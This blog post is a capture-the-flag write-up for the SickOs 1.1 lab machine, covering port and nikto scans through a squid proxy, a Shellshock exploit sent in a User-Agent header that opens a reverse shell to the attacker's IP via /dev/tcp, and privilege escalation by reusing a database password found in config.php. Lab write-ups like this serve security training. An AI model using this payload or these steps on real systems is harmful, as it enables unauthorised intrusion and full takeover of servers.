Mr_H4sh

Infosec, CTF and more

SickOs Solution

Hi guys,

In this post I’m going to show you how to solve the SickOS VM provided by D4rk.

Thanks to Vulnhub for keeping me busy with all these challenges, and thanks to everyone that hosts new challenges.

This challenge involves various hacking techniques.

First step: INFORMATION GATHERING

The description provided on Vulnhub says that the machine will have an IP assigned automatically, so this is the situation:

192.168.56.102 <== attacker
192.168.56.105 <== victim

A port scan on the victim host gives this:

# nmap -sT -p -v -n -Pn 192.168.56.105 -T5

Nmap scan report for 192.168.56.105
Host is up (0.00053s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy

I see that there’s a squid proxy running on the server and an http proxy, apart from the ssh port open.

I visit the URL http://192.168.56.105:80 through the proxy http://192.168.56.105:3128, and this is what I see:

bleah

Second step: VULNERABILITY SCAN

I start a vulnerability scan with nikto to find vulnerabilities on the website:

# nikto -useproxy http://192.168.56.105:3128 -h http://192.168.56.105:3128

---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        80
+ Proxy:              192.168.56.105:3128
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec  4 19:35:02 2015
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header 'nikto-added-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3233: /icons/README: Apache default file found.

I also spider the website with Burp Suite and I find a hidden file robots.txt with the following content:

User-agent: *
Disallow: /
Disallow: /wolfcms

The URL http://192.168.56.105/wolfcms gives this:

wolfcms

Third Step: EXPLOITATION

The website is vulnerable to ShellShock, so I configure BurpSuite to send requests via the proxy http://192.168.56.105:3128, I setup netcat to listen on a local port 443 and then I send a command to bind a reverse shell on my local:

On local machine:

nc -l -v -p 443

On remote machine I send a GET request injecting the reverse shell command into the User-Agent field:

GET http://192.168.56.105/cgi-bin/status HTTP/1.1

Host: 192.168.56.105
User-Agent: () { :; };/bin/sh -i >& /dev/tcp/192.168.56.102/443 0>&1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

and a reverse shell is on my local machine.

I spawn a shell and start wandering around, and I find a tasty informations into the /var/www/wolfcms/config.php file:

<?php 

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
?>

I try to use the password for the root user, but is not working, so I have a look at the /etc/passwd file and I find the user sickos.

I try to login as user sickos with the password john@123 and I’m in, and sickos is also a sudoer.

So, time to get the flag.

www-data@SickOs:/var/www/wolfcms$ su - root  
su - root
Password: john@123

su: Authentication failure
www-data@SickOs:/var/www/wolfcms$ su - sickos
su - sickos
Password: john@123

sickos@SickOs:~$ ls -l
ls -l
total 0
sickos@SickOs:~$ sudo su
sudo su
[sudo] password for sickos: john@123

root@SickOs:~# cd /root
cd /root
root@SickOs:~# ls -l
ls -l
total 4
-rw-r--r-- 1 root root 96 Dec  6 07:27 a0216ea4d51874464078c618298b1367.txt
root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying


root@SickOs:~# 

Conclusion

As usual, for any information or comment, please do not hesitate to leave a comment.

./A